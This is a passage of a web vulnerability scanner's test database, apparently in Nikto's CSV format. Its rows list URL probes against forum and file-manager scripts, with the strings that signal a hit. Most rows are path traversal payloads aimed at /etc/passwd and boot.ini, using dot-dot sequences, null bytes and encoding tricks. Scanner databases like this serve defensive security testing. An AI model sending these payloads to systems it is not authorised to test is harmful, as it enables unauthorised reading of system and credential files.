scanner.\",\"\",\"\"\n\"002350\",\"3093\",\"1\",\"/filemanager/index.php3\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002351\",\"3093\",\"1\",\"/filemgmt/brokenfile.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002352\",\"3093\",\"1\",\"/filemgmt/singlefile.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002353\",\"3093\",\"1\",\"/filemgmt/viewcat.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002354\",\"3093\",\"1\",\"/filemgmt/visit.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002355\",\"3093\",\"1\",\"/foro/YaBB.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002356\",\"3093\",\"1\",\"/forum-ra.asp?n=....//....//....//....//....//....//....//etc.passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002357\",\"3093\",\"1\",\"/forum-ra.asp?n=../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002358\",\"3093\",\"1\",\"/forum-ra.asp?n=../../../../../../../../../etc/passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002359\",\"3093\",\"1\",\"/forum-ra.asp?n=/../../../../../../../../../../../boot.ini\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002360\",\"3093\",\"1\",\"/forum-ra.asp?n=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./boot.ini\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002361\",\"3093\",\"1\",\"/forum-ra.asp?n=/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002362\",\"3093\",\"1\",\"/forum-ra.asp?n=/etc/passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002363\",\"3093\",\"1\",\"/forum-ra.asp?n=c:\\boot.ini\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002364\",\"3093\",\"1\",\"/forum-ra_professionnel.asp?n=%60/etc/passwd%60\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002365\",\"3093\",\"1\",\"/forum-ra_professionnel.asp?n=../../../../../../../../../etc/passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002366\",\"3093\",\"1\",\"/forum-ra_professionnel.asp?n=../../boot.ini\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002367\",\"3093\",\"1\",\"/forum-ra_professionnel.asp?n=/....../boot.ini\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002368\",\"3093\",\"1\",\"/forum-ra_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002369\",\"3093\",\"1\",\"/forum-ra_professionnel.asp?n=/../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002370\",\"3093\",\"1\",\"/forum-ra_professionnel.asp?n=/../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002371\",\"3093\",\"1\",\"/forum-ra_professionnel.asp?n=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./boot.ini\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002372\",\"3093\",\"1\",\"/forum-ra_professionnel.asp?n=/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002373\",\"3093\",\"1\",\"/forum-ra_professionnel.asp?n=/etc/passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002374\",\"3093\",\"1\",\"/forum-ra_professionnel.asp?n=c:\\boot.ini\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002375\",\"3093\",\"1\",\"/forum.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002376\",\"3093\",\"1\",\"/forum.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002377\",\"3093\",\"1\",\"/forum.asp?n=../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002378\",\"3093\",\"1\",\"/forum.asp?n=/....../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002379\",\"3093\",\"1\",\"/forum.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002380\",\"3093\",\"1\",\"/forum.asp?n=/../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002381\",\"3093\",\"1\",\"/forum.asp?n=/../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002382\",\"3093\",\"1\",\"/forum.asp?n=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002383\",\"3093\",\"1\",\"/forum.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002384\",\"3093\",\"1\",\"/forum.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002385\",\"3093\",\"1\",\"/forum.asp?n=c:\\boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002386\",\"3093\",\"1\",\"/forum/mainfile.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002387\",\"3093\",\"1\",\"/forum/member.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002388\",\"3093\",\"1\",\"/forum/newreply.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002389\",\"3093\",\"1\",\"/forum/newthread.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002390\",\"3093\",\"b\",\"/forum/viewtopic.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"phpBB found.\",\"\",\"\"\n\"002391\",\"3093\",\"1\",\"/forum1.asp?n=%60/etc/passwd%60&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002392\",\"3093\",\"1\",\"/forum1.asp?n=....//....//....//....//....//....//....//etc.passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002393\",\"3093\",\"1\",\"/forum1.asp?n=../../../../../../../../../etc/passwd%00&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002394\",\"3093\",\"1\",\"/forum1.asp?n=../../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002395\",\"3093\",\"1\",\"/forum1.asp?n=/....../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002396\",\"3093\",\"1\",\"/forum1.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002397\",\"3093\",\"1\",\"/forum1.asp?n=/../../../../../../etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002398\",\"3093\",\"1\",\"/forum1.asp?n=/../../../etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002399\",\"3093\",\"1\",\"/forum1.asp?n=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002400\",\"3093\",\"1\",\"/forum1.asp?n=/etc/passwd%00&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002401\",\"3093\",\"1\",\"/forum1.asp?n=/etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002402\",\"3093\",\"1\",\"/forum1.asp?n=1753&amp;nn=%60/etc/passwd%60\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002403\",\"3093\",\"1\",\"/forum1.asp?n=1753&amp;nn=....//....//....//....//....//....//....//etc.passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002404\",\"3093\",\"1\",\"/forum1.asp?n=1753&amp;nn=../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002405\",\"3093\",\"1\",\"/forum1.asp?n=1753&amp;nn=../../../../../../../../../../etc/passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002406\",\"3093\",\"1\",\"/forum1.asp?n=1753&amp;nn=/....../boot.ini\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002407\",\"3093\",\"1\",\"/forum1.asp?n=1753&amp;nn=/..../boot.ini\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002408\",\"3093\",\"1\",\"/forum1.asp?n=1753&amp;nn=/../../../../../../../../../../../../../../../../../../../../boot.ini\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002409\",\"3093\",\"1\",\"/forum1.asp?n=1753&amp;nn=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./boot.ini\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002410\",\"3093\",\"1\",\"/forum1.asp?n=1753&amp;nn=/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002411\",\"3093\",\"1\",\"/forum1.asp?n=1753&amp;nn=/etc/passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002412\",\"3093\",\"1\",\"/forum1.asp?n=1753&amp;nn=c:\\boot.ini\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002413\",\"3093\",\"1\",\"/forum1.asp?n=c:\\boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002414\",\"3093\",\"1\",\"/forum1_professionnel.asp?n=%60/etc/passwd%60&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002415\",\"3093\",\"1\",\"/forum1_professionnel.asp?n=....//....//....//....//....//....//....//etc.passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002416\",\"3093\",\"1\",\"/forum1_professionnel.asp?n=../../../../../../../../../etc/passwd%00&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002417\",\"3093\",\"1\",\"/forum1_professionnel.asp?n=/....../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002418\",\"3093\",\"1\",\"/forum1_professionnel.asp?n=/.../.../.../.../.../.../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002419\",\"3093\",\"1\",\"/forum1_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002420\",\"3093\",\"1\",\"/forum1_professionnel.asp?n=/../../../../../../../../etc/passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002421\",\"3093\",\"1\",\"/forum1_professionnel.asp?n=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002422\",\"3093\",\"1\",\"/forum1_professionnel.asp?n=/etc/passwd%00&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002423\",\"3093\",\"1\",\"/forum1_professionnel.asp?n=/etc/passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002424\",\"3093\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=%60/etc/passwd%60&amp;page=1\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002425\",\"3093\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=....//....//....//....//....//....//....//etc.passwd&amp;page=1\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002426\",\"3093\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=../../../../../../../../../etc/passwd%00&amp;page=1\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002427\",\"3093\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=/....../boot.ini&amp;page=1\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002428\",\"3093\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;page=1\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002429\",\"3093\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=/../../../../../../../../etc/passwd&amp;page=1\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002430\",\"3093\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./boot.ini&amp;page=1\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002431\",\"3093\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=/etc/passwd%00&amp;page=1\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002432\",\"3093\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=/etc/passwd&amp;page=1\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002433\",\"3093\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=%60/etc/passwd%60\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002434\",\"3093\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=....//....//....//....//....//....//....//etc.passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002435\",\"3093\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=../../../../../../../../../etc/passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002436\",\"3093\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/....../boot.ini\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002437\",\"3093\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/..../boot.ini\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002438\",\"3093\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/.../.../.../.../.../.../boot.ini\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002439\",\"3093\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/../../../../../../../../../../../../../../../../../../../../boot.ini\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002440\",\"3093\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002441\",\"3093\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./boot.ini\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002442\",\"3093\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002443\",\"3093\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/etc/passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002444\",\"3093\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=c:\\boot.ini\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002445\",\"3093\",\"1\",\"/forum1_professionnel.asp?n=1771&amp;nn=c:\\boot.ini&amp;page=1\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002446\",\"3093\",\"1\",\"/forum1_professionnel.asp?n=c:\\boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002447\",\"3093\",\"1\",\"/forum_arc.asp?n=%60/etc/passwd%60|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002448\",\"3093\",\"1\",\"/forum_arc.asp?n=../../../../../../../../../etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002449\",\"3093\",\"1\",\"/forum_arc.asp?n=/....../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002450\",\"3093\",\"1\",\"/forum_arc.asp?n=/.../.../.../.../.../.../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002451\",\"3093\",\"1\",\"/forum_arc.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002452\",\"3093\",\"1\",\"/forum_arc.asp?n=/../../../../../../../../etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown 